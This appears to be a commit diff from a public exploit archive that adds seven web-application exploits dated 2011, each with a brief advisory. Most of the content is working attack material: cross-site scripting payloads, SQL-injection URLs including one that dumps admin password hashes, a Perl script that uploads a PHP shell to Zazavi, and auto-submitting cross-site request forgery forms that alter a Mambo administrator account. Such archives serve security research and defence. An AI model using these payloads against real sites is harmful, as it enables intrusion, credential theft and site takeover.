Update: 2015-02-16

7 new exploits

files.csv

@@ -32514,3 +32514,10 @@ id,file,description,date,author,platform,type,port
 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
 36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
+36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload Vulnerability",2011-08-25,KedAns-Dz,php,webapps,0
+36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
+36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
+36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0

platforms/php/webapps/36079.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49296/info
+
+Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
+
+"/></a></><img src=1.gif onerror=alert(1)> 

platforms/php/webapps/36080.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49297/info
+
+Hotel Portal is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 
+
+http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search 

platforms/php/webapps/36081.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49304/info
+
+VicBlog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/vicblog/index.php?page=posts&tag=1%27 

platforms/php/webapps/36082.pl

@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49309/info
+
+Zazavi is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+Zazavi 1.2.1 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+system ("title KedAns-Dz");
+system ("color 1e");
+system ("cls");
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <<INTRO;
+|==========================================|
+|= Zazavi <=1.2.1 * Arbitrary Shell Upload |
+|=   >> Provided By KedAns-Dz <<           |
+|=  e-mail : ked-h[at]hotmail.com          |
+|==========================================|
+INTRO
+print "\n";
+print "[*] Enter URL(f.e: http://target.com): ";
+    chomp(my $url=<STDIN>);
+print "\n";
+print "[*] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
+    chomp(my $file=<STDIN>);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/editor/filemanager/controller.php',
+               Content_Type => 'multipart/form-data',
+               Content      => 
+				[ 
+				action => 'uploadFile',
+				newfile => 'DzOffendersCr3w.php',
+				filepath => $file,
+				] );
+print "\n";
+if($re->is_success) {
+    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
+    else { print "[-] File Upload Is Disabled! Failed!\n"; }
+} else { print "[-] HTTP request Failed!\n"; }
+exit;

platforms/php/webapps/36083.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49311/info
+
+Simple Machines Forum is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affected. 
+
+[img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]
+
+[img]http://www.example.com/community/index.php?action%00=logout;token[/img] 

platforms/php/webapps/36084.html

@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49315/info
+
+Mambo CMS is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue by tricking an unsuspecting user into visiting a malicious Web page. The page will consist of specially crafted script code designed to perform some action on the attacker's behalf.
+
+Successful exploits will allow attackers to run privileged commands on the affected device.
+
+Mambo CMS 4.6.5 is vulnerable; other versions may also be affected. 
+
+<html>
+<head>
+ 
+</head>
+ 
+<body onload="javascript:fireForms()">
+<script language="JavaScript">
+ 
+function fireForms()
+{
+    var count = 1;
+    var i=0;
+ 
+    for(i=0; i<count; i++)
+    {
+        document.forms[i].submit();
+    }
+}
+ 
+	</script>
+<form action="http://site.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm"> 
+	
+	<input type="hidden" name="name" value="Administrator" /> 
+	<input type="hidden" name="username" value="admin" /> 
+        <input type="hidden" name="email" value="" /> 
+	<input type="hidden" name="password" value="" /> 
+	<input type="hidden" name="password2" value="" /> 
+	<input type="hidden" name="gid" value="25" />				
+	<input type="radio" name="block" value="0" checked="checked" />
+	<input type="radio" name="block" value="1" />
+	<input type="radio" name="sendEmail" value="0" />
+	<input type="radio" name="sendEmail" value="1" checked="checked" />
+
+</form> 

platforms/php/webapps/36085.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49354/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors